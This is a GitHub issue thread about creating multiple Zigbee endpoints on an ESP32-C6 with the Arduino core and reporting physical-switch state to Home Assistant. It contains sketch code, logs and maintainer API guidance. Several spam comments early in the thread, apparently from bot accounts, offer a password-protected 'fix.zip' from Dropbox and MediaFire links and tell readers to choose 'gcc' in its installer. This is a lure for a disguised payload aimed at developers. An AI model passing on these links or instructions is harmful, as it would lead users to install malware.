espressif/arduino-esp32 #10240: Need Multiple light examples for HA on off light

sonirohit3, 2024-08-26:
### Board

ESP32-C6

### Device Description

[image]
[image]

### Hardware Configuration

Custom Board

### Version

latest master (checkout manually)

### IDE Name

Arduino IDE

### Operating System

Windows 11

### Flash frequency

80 MHz

### PSRAM enabled

no

### Upload speed

115200

### Description

I am trying to create multiple endpoints on Zigbee but only 1st endpoints are detected.

### Sketch

```cpp
// Copyright 2023 Espressif Systems (Shanghai) PTE LTD
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at

//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

/**
 * @brief This example demonstrates simple Zigbee light bulb.
 *
 * The example demonstrates how to use ESP Zigbee stack to create a end device light bulb.
 * The light bulb is a Zigbee end device, which is controlled by a Zigbee coordinator.
 *
 * Proper Zigbee mode must be selected in Tools->Zigbee mode
 * and also the correct partition scheme must be selected in Tools->Partition Scheme.
 *
 * Please check the README.md for instructions and more detailed description.
 */

[... 274 lines cut ...]
INTERNAL Memory Info:<CR><LF>
------------------------------------------<CR><LF>
  Total Size        :   450956 B ( 440.4 KB)<CR><LF>
[   784][I][Zigbee_Light_Bulb_Updated.ino:112] esp_zb_app_signal_handler(): ZDO signal: ZDO Config Ready (0x17), status: ESP_FAIL<CR><LF>
[   797][I][Zigbee_Light_Bulb_Updated.ino:80] esp_zb_app_signal_handler(): Zigbee stack initialized<CR><LF>
[   807][I][Zigbee_Light_Bulb_Updated.ino:86] esp_zb_app_signal_handler(): Device started up in  factory-reset mode<CR><LF>
[   817][I][Zigbee_Light_Bulb_Updated.ino:88] esp_zb_app_signal_handler(): Start network formation<CR><LF>
  Free Bytes        :   392436 B ( 383.2 KB)<CR><LF>
  Allocated Bytes   :    50376 B (  49.2 KB)<CR><LF>
  Minimum Free Bytes:   391008 B ( 381.8 KB)<CR><LF>
  Largest Free Block:   368628 B ( 360.0 KB)<CR><LF>
------------------------------------------<CR><LF>
GPIO Info:<CR><LF>
------------------------------------------<CR><LF>
  GPIO : BUS_TYPE[bus/unit][chan]<CR><LF>
  --------------------------------------  <CR><LF>
     8 : RMT_TX<CR><LF>
    16 : UART_TX[0]<CR><LF>
    17 : UART_RX[0]<CR><LF>
============ After Setup End =============<CR><LF>
```

### I have checked existing issues, online documentation and the Troubleshooting Guide

- [X] I confirm I have checked existing issues, online documentation and Troubleshooting guide.

esttemanb, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Mlecherf, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

esttemanb, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

P-R-O-C-H-Y, 2024-08-26:
Hi @sonirohit3, I am now working on the Zigbee library for ESP Arduino. Follow issue #10135 for more details. 
With the code you are using you can ask for help on esp-zigbee-sdk repository :) Thanks

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sonirohit3, 2024-08-26:
Hi Prochy, Thanks for the information. I will keep track of this. It would be really nice if somehow, I can get the sample code for multiple endpoints early. I have the hardware ready.

Regards,
Rohit Soni

VojtechBartoska, 2024-08-26:
FIY: Those deleted comments have been from some bot with suspicious content.

sonirohit3, 2024-08-27:
Hi @P-R-O-C-H-Y  , 
I am now able to add multiple endpoints and the same are detected on the HA. This device has onboard switch from which I can toggle the LED. I need suggestion on how I can update the same to the HA server when LED is toggled with a physical switch. Below is my sample code. This creates a light and a Smart plug on HA.

#ifndef ZIGBEE_MODE_ED
#error "Zigbee end device mode is not selected in Tools->Zigbee mode"
#endif

#include "esp_zigbee_core.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "ha/esp_zigbee_ha_standard.h"

#define LED_PIN       1
#define LED_PIN_2      2  // Define second LED pin

/* Default End Device config */
#define ESP_ZB_ZED_CONFIG()                                     \
    {                                                           \
        .esp_zb_role = ESP_ZB_DEVICE_TYPE_ED,                   \
        .install_code_policy = INSTALLCODE_POLICY_ENABLE,       \
        .nwk_cfg = {                                            \
            .zed_cfg = {                                        \
                .ed_timeout = ED_AGING_TIMEOUT,                 \
                .keep_alive = ED_KEEP_ALIVE,                    \
            },                                                  \
        },                                                      \
    }

#define ESP_ZB_ZC_CONFIG()                                                                                        \
  {                                                                                                               \
    .esp_zb_role = ESP_ZB_DEVICE_TYPE_COORDINATOR, .install_code_policy = INSTALLCODE_POLICY_ENABLE, .nwk_cfg = { \
      .zczr_cfg =                                                                                                 \
        {                                                                                                         \
          .max_children = MAX_CHILDREN,                                                                           \
        },                                                                                                        \
    }                                                                                                             \
  }

#define ESP_ZB_DEFAULT_RADIO_CONFIG()                           \
    {                                                           \
        .radio_mode = ZB_RADIO_MODE_NATIVE,                     \
    }

#define ESP_ZB_DEFAULT_HOST_CONFIG()                            \
    {                                                           \
        .host_connection_mode = ZB_HOST_CONNECTION_MODE_NONE,   \
    }

/* Zigbee configuration */
#define MAX_CHILDREN                10
#define INSTALLCODE_POLICY_ENABLE       false    /* disable the install code policy for security */
#define ED_AGING_TIMEOUT                ESP_ZB_ED_AGING_TIMEOUT_64MIN
#define ED_KEEP_ALIVE                   3000    /* 3000 milliseconds */
#define HA_ONOFF_SWITCH_ENDPOINT           10      /* esp light bulb device endpoint */
#define ESP_ZB_PRIMARY_CHANNEL_MASK     ESP_ZB_TRANSCEIVER_ALL_CHANNELS_MASK  /* Zigbee primary channel mask */

/********************* Zigbee functions **************************/
static void bdb_start_top_level_commissioning_cb(uint8_t mode_mask)
{
    ESP_ERROR_CHECK(esp_zb_bdb_start_top_level_commissioning(mode_mask));
}

void esp_zb_app_signal_handler(esp_zb_app_signal_t *signal_struct)
{
    uint32_t *p_sg_p       = signal_struct->p_app_signal;
    esp_err_t err_status = signal_struct->esp_err_status;
    esp_zb_app_signal_type_t sig_type = (esp_zb_app_signal_type_t)*p_sg_p;
    switch (sig_type) {
    case ESP_ZB_ZDO_SIGNAL_SKIP_STARTUP:
        log_i("Zigbee stack initialized");
[... 181 lines cut ...]
    pinMode(LED_PIN, OUTPUT);
    pinMode(LED_PIN_2, OUTPUT);
    
    // Turn off LEDs
    digitalWrite(LED_PIN, LOW);
    digitalWrite(LED_PIN_2, LOW);

    // Start Zigbee task
    xTaskCreate(esp_zb_task, "Zigbee_main", 4096, NULL, 5, NULL);
    pinMode(9,INPUT_PULLUP);
    digitalWrite(9,HIGH);
}

void loop() 
{

  if(!digitalRead(9))
  {
    digitalWrite(LED_PIN, !digitalRead(LED_PIN));

    log_e("Light Toggled with switch");
    delay(1000);
  }
    // No code in main loop, zigbee task handles everything
}

P-R-O-C-H-Y, 2024-08-28:
@sonirohit3 Can you please format the code in the comment so its readable? Thanks

sonirohit3, 2024-08-28:
> @sonirohit3 Can you please format the code in the comment so its readable? Thanks

Certainly! Edited my previous comment and attached the INO file in compressed zip. I am also trying to see how a fan type device can be implemented in this. The device has rotary encoder which can we used to increase / decrease fan speed. Any suggestion on this?

sonirohit3, 2024-09-07:
Hi @P-R-O-C-H-Y , Any suggestion on above? Please suggest how to modify the light bulb example code to add a switch and send back the updated status to HA when toggled.

P-R-O-C-H-Y, 2024-09-17:
Hi @sonirohit3, you will need to set the attribute value using 
```
esp_zb_zcl_status_t esp_zb_zcl_set_attribute_val(uint8_t endpoint, uint16_t cluster_id, uint8_t cluster_role, uint16_t attr_id, void *value_p, bool check);
``` 
For more info take a look [here](https://github.com/espressif/esp-zigbee-sdk/blob/d4af0c84351b75395a984277f6a55a6d7a46c07b/components/esp-zigbee-lib/include/esp_zigbee_attribute.h#L60)

closed 2024-11-14 by P-R-O-C-H-Y

sonirohit3, 2024-12-09:
Hi @P-R-O-C-H-Y , Thanks for the example. I am now able to implement multiple lights and works great. In my device I have physical switches as well from which I can turn on and off the lights. I need to report this updated state back to HA. Can I have an example or a snippet of the code to do so?

P-R-O-C-H-Y, 2024-12-10:
Hi @sonirohit3, I am happy to hear it's working great! Thanks for the feedback.
If you use On/Off Lights you can call `void setLight(bool state);`. That function will update the state of the light in the Zigbee stack and will call the `onLightChange` callback you passed in the code. So on the physical switch press you just need to call that function.

For ColorDimmableLight there are more APIs for that:
```
  void setLightState(bool state);     //sets light on/off
  void setLightLevel(uint8_t level);  //sets light level (brightness)
  void setLightColor(uint8_t red, uint8_t green, uint8_t blue);  //sets light color in RGB
  void setLight(bool state, uint8_t level, uint8_t red, uint8_t green, uint8_t blue);   //sets light with all parameters 
```
The approach is the same, you just call one of those or multiple, and it will trigger the callback `onLightChange`, where the light change will be processed.

sonirohit3, 2024-12-10:
Hi @P-R-O-C-H-Y , Thanks for the suggestion. I did check the example code and then .c file. Got 3 lines where the value to the endpoint is updated. I am calling these manually in my code but the server doesn't seem to get these updated. Below are the lines. Am I doing something wrong in here?
void Update_devstate_server (uint8_t dev_endpoint , int16_t value)
{
 
    log_i("Updating Endpoint : %d with value : %d", dev_endpoint ,value);
    if (dev_endpoint < HA_FAN_SWITCH_ENDPOINT)
    {

        uint8_t val=value;
        esp_zb_lock_acquire(portMAX_DELAY);
        esp_zb_zcl_set_attribute_val(dev_endpoint, ESP_ZB_ZCL_CLUSTER_ID_ON_OFF,   ESP_ZB_ZCL_CLUSTER_SERVER_ROLE, ESP_ZB_ZCL_ATTR_ON_OFF_ON_OFF_ID, &val, false);
        esp_zb_lock_release();
  
    }
} 

Logs:
[ 31993][I][Handle_Zigbee.ino:48] Update_devstate_server(): Updating Endpoint : 14 with value : 1
Dev5 state is now: 1

On the top of this, is there any method to timesync on zigbee?

sonirohit3, 2024-12-10:
Hi @P-R-O-C-H-Y , Everything is working. I called in the function internals directly in my code. Thanks for the great examples. Do you have any suggestion on timesync? I know on wifi it's easy but on Zigbee have no idea.

P-R-O-C-H-Y, 2024-12-11:
The Time cluster is planned to be added. I can't say it will be done until the end of the year as its close, but it will be added for sure.